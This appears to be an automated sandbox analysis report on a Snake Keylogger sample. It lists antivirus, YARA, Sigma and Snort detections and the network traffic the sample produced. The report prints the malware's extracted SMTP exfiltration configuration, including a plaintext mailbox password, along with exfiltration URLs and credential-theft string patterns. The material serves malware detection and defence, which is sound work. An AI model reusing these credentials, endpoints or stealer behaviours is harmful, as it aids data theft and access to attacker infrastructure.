Edit tour

Windows Analysis Report
Zarefy4bOs.exe

Overview

General Information

Sample name:	Zarefy4bOs.exe renamed because original name is a hash value
Original sample name:	e81ff60c955d9f232d4812a68ef4335f204be923d6aa75c5d309e8fe76eed1ed.exe
Analysis ID:	1422062
MD5:	eb9d9bc525bf2cfd5a566ff1939a65d8
SHA1:	d1d9c33251db984f86a31033d94e365ff2787ad6
SHA256:	e81ff60c955d9f232d4812a68ef4335f204be923d6aa75c5d309e8fe76eed1ed
Tags:	exe
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Snake Keylogger

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Zarefy4bOs.exe (PID: 3648 cmdline: "C:\Users\user\Desktop\Zarefy4bOs.exe" MD5: EB9D9BC525BF2CFD5A566FF1939A65D8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Zarefy4bOs.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Zarefy4bOs.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Zarefy4bOs.exe	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Zarefy4bOs.exe	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x15b97:$a11: KeyLoggerEventArgsEventHandler
Zarefy4bOs.exe	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c29b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b4cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b900:$a4: \Orbitum\User Data\Default\Login Data 0x1c93f:$a5: \Kometa\User Data\Default\Login Data
Zarefy4bOs.exe	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x15534:$s2: SetHook 0x1553c:$s3: CallNextHook 0x15549:$s4: _hook
Zarefy4bOs.exe	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID 0x19b27:$m4: \SnakeKeylogger\
Click to see the 2 entries

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14782:$a1: get_encryptedPassword 0x14a78:$a2: get_encryptedUsername 0x1458e:$a3: get_timePasswordChanged 0x14689:$a4: get_passwordField 0x14798:$a5: set_encryptedPassword 0x15d9b:$a7: get_logins 0x15cfe:$a10: KeyLoggerEventArgs 0x15997:$a11: KeyLoggerEventArgsEventHandler
00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x180c0:$x1: $%SMTPDV$ 0x18124:$x2: $#TheHashHere%& 0x1975f:$x3: %FTPDV$ 0x19853:$x4: $%TelegramDv$ 0x15997:$x5: KeyLoggerEventArgs 0x15cfe:$x5: KeyLoggerEventArgs 0x19783:$m2: Clipboard Logs ID 0x1994f:$m2: Screenshot Logs ID 0x19a1b:$m2: keystroke Logs ID 0x19927:$m4: \SnakeKeylogger\
00000000.00000002.4461938228.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Zarefy4bOs.exe PID: 3648	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Zarefy4bOs.exe PID: 3648	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Zarefy4bOs.exe PID: 3648	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x24075:$a1: get_encryptedPassword 0x24361:$a2: get_encryptedUsername 0x23e8b:$a3: get_timePasswordChanged 0x23f86:$a4: get_passwordField 0x2408b:$a5: set_encryptedPassword 0x265d3:$a7: get_logins 0x26536:$a10: KeyLoggerEventArgs 0x261cf:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Zarefy4bOs.exe PID: 3648	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x261cf:$x5: KeyLoggerEventArgs 0x26536:$x5: KeyLoggerEventArgs 0x26e24:$x5: KeyLoggerEventArgs 0x27158:$x5: KeyLoggerEventArgs 0x28758:$m2: Clipboard Logs ID 0x28838:$m2: Screenshot Logs ID 0x2886c:$m2: keystroke Logs ID 0x28824:$m4: \SnakeKeylogger\
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.Zarefy4bOs.exe.420000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.Zarefy4bOs.exe.420000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.Zarefy4bOs.exe.420000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.0.Zarefy4bOs.exe.420000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x15b97:$a11: KeyLoggerEventArgsEventHandler
0.0.Zarefy4bOs.exe.420000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c29b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b4cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b900:$a4: \Orbitum\User Data\Default\Login Data 0x1c93f:$a5: \Kometa\User Data\Default\Login Data
0.0.Zarefy4bOs.exe.420000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x15534:$s2: SetHook 0x1553c:$s3: CallNextHook 0x15549:$s4: _hook
0.0.Zarefy4bOs.exe.420000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID 0x19b27:$m4: \SnakeKeylogger\
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.225, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Zarefy4bOs.exe, Initiated: true, ProcessId: 3648, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49728

Snort Signatures

ET TROJAN Snake Keylogger Exfil via SMTP - Source IP: 192.168.2.5 - Destination IP: 208.91.199.225

Timestamp:	04/08/24-10:03:49.773592
SID:	2044767
Source Port:	49728
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Zarefy4bOs.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: scratchdreams.tk	Virustotal: Detection: 6%	Perma Link
Source: https://scratchdreams.tk	Virustotal: Detection: 15%	Perma Link
Source: http://scratchdreams.tk	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for submitted file

Source: Zarefy4bOs.exe	ReversingLabs: Detection: 65%
Source: Zarefy4bOs.exe	Virustotal: Detection: 67%			Perma Link

Machine Learning detection for sample

Source: Zarefy4bOs.exe

Joe Sandbox ML: detected

Source: Zarefy4bOs.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49706 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49720 version: TLS 1.2

Source: Zarefy4bOs.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0266FCD1h	0_2_0266FA10
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0266EFDDh	0_2_0266EDF0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0266F967h	0_2_0266EDF0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	0_2_0266E310
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 027615D8h	0_2_027611C0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 02761011h	0_2_02760D60
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276DCC1h	0_2_0276DA18
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276E571h	0_2_0276E2C8
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276EE21h	0_2_0276EB78
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276B5A9h	0_2_0276B300
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276BE59h	0_2_0276BBB0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 027602F1h	0_2_02760040
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276C2B1h	0_2_0276C008
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276CB61h	0_2_0276C8B8
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276FB29h	0_2_0276F880
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276D411h	0_2_0276D168
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 02760BB1h	0_2_02760900
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 027615D8h	0_2_027611B1
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276E119h	0_2_0276DE70
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276BA01h	0_2_0276B758
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276E9C9h	0_2_0276E720
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276F279h	0_2_0276EFD0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276C709h	0_2_0276C460
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276F6D1h	0_2_0276F428
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 02760751h	0_2_027604A0
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276CFB9h	0_2_0276CD10
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 027615D8h	0_2_02761506
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Code function: 4x nop then jmp 0276D869h	0_2_0276D5C0

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.5:49728 -> 208.91.199.225:587

Yara detected Generic Downloader

Source: Yara match	File source: Zarefy4bOs.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.5:49728 -> 208.91.199.225:587

Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 208.91.199.225 208.91.199.225

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic

TCP traffic: 192.168.2.5:49728 -> 208.91.199.225:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49706 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: checkip.dyndns.org

Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002935000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002987000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Zarefy4bOs.exe	String found in binary or memory: http://checkip.dyndns.org/q
Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.000000000295C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://scratchdreams.tk
Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002987000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Zarefy4bOs.exe	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002987000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
Source: Zarefy4bOs.exe	String found in binary or memory: https://scratchdreams.tk
Source: Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
